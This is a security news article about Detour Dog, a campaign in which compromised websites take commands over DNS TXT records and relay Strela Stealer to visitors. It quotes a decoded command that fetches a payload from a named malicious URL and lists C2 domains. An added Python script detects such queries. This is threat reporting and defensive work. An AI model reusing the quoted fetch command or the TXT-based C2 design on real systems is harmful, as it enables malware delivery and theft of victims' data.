New DNS Malware Detour Dog Delivers Strela Stealer Using DNS TXT Records

Published October 2, 2025

A newly identified DNS-based malware campaign, referred to as Detour Dog, leverages compromised websites worldwide to deliver the Strela Stealer malware through DNS TXT records. This method represents a significant advancement in malware distribution, utilizing the Domain Name System as both a command-and-control mechanism and a delivery channel.

The campaign affects numerous websites globally, creating a network of infected hosts that communicate with actor-controlled name servers through specially crafted DNS queries. Because these DNS requests are issued server-side, they are invisible to website visitors, allowing the malicious infrastructure to operate covertly.

Infected sites conditionally redirect visitors to malicious content based on geographic location and device type, incorporating a sophisticated filtering mechanism to evade detection. The campaign, initially focused on redirecting users to fraudulent websites, has shifted towards direct malware distribution, targeting European users with the Strela Stealer payload.

Infoblox analysts identified a connection between Detour Dog infrastructure and Strela Stealer operations, discovering that 69 percent of confirmed StarFish staging hosts were under Detour Dog control during the summer of 2025. This indicates active participation in multi-stage malware delivery chains aimed at information theft.

Advanced DNS TXT Command and Control Infrastructure

Detour Dog’s DNS-based command and control system exploits DNS TXT record functionality for malware communication. The infected websites generate DNS queries with victim information embedded into the subdomain structure:

<infected-host>.<visitor-ip>.<rand-num>.<type>.c2_domain

An upgrade in spring 2025 added remote code execution capabilities triggered by Base64-encoded responses containing the keyword “down.” This enables compromised websites to function as proxy servers for malware distribution.

The DNS TXT responses facilitate complex multi-stage payload delivery, exemplified by decoded commands like:

downhttp://updatemsdnserver.com/script.php?u=j6cwaj0h67

This command instructs the infected site to retrieve content from a StarFish C2 server and relay it to the victim, forming a distributed delivery network. The system supports both script.php and file.php endpoints, corresponding to different Strela Stealer delivery stages.
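To make the query shape and the Base64 "down" instruction described above concrete, here is an added detection example (not code from the report or from Infoblox) that scans constructed resolver-log lines for TXT queries to the two C2 domains named in the article and decodes any "down" command; the log line format, the infected-host names and the visitor-ip encoding are assumptions.

```python
# Added example, not from the original report: flag Detour Dog-style DNS TXT
# C2 traffic in a resolver log. Assumptions, all constructed for this example:
#  - log lines look like "<timestamp> <qname> TXT <base64-answer|NXDOMAIN>"
#  - the visitor-ip label is kept verbatim (the article does not say how it is encoded)
import base64
import binascii

KNOWN_C2_DOMAINS = {"webdmonitor.io", "aeroarrows.io"}  # both named in the article

def parse_query(qname):
    """Split <infected-host>.<visitor-ip>.<rand-num>.<type>.c2_domain from the right."""
    qname = qname.rstrip(".").lower()
    c2 = next((d for d in KNOWN_C2_DOMAINS if qname.endswith("." + d)), None)
    if c2 is None:
        return None
    labels = qname[: -len(c2) - 1].split(".")
    if len(labels) < 4 or not labels[-2].isdigit():
        return None  # too few labels for the four fields, or rand-num not numeric
    return {"c2_domain": c2, "infected_host": ".".join(labels[:-3]),
            "visitor_ip": labels[-3], "rand_num": labels[-2], "type": labels[-1]}

def decode_command(txt):
    """Base64-decode a TXT answer; return the URL if it is a 'down' instruction."""
    try:
        plain = base64.b64decode(txt, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # not valid Base64, so not a Detour Dog command
    if plain.startswith("down") and plain[4:].startswith(("http://", "https://")):
        return plain[4:]
    return None

def scan_log(lines):
    """One finding per TXT query to a known C2 domain; 'command' is the decoded URL or None."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) == 4 and parts[2] == "TXT" and (q := parse_query(parts[1])):
            q["command"] = decode_command(parts[3])
            findings.append(q)
    return findings

def sample_log():
    """Constructed log lines: one 'down' command, one benign TXT, one query to the sinkholed C2."""
    cmd = base64.b64encode(b"downhttp://updatemsdnserver.com/script.php?u=j6cwaj0h67").decode()
    return [f"2025-08-01T10:00:01Z www.shop.example.203-0-113-7.48213.1.aeroarrows.io TXT {cmd}",
            "2025-08-01T10:00:02Z _dmarc.example.org TXT dj1ETUFSQzE7IHA9cmVqZWN0",
            "2025-08-01T10:00:03Z blog.example.198-51-100-9.9331.2.webdmonitor.io TXT NXDOMAIN"]
```

Queries to the C2 domains are reported even when the answer carries no command, since the query alone identifies an infected host.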

When the Shadowserver Foundation sinkholed the webdmonitor.io domain in August 2025, Detour Dog operators quickly established a replacement C2 server, transferring control to the aeroarrows.io domain. Analysis revealed approximately 30,000 unique domains generating DNS TXT queries to the actor-controlled infrastructure.

The operation highlights DNS as a covert communication channel for malware: the distributed nature of the infected network and the traffic's resemblance to legitimate DNS activity make it hard for traditional security monitoring to spot. It marks a notable step in malware distribution techniques, using DNS infrastructure as both a command channel and a content delivery mechanism.

Written By
Anna Fields
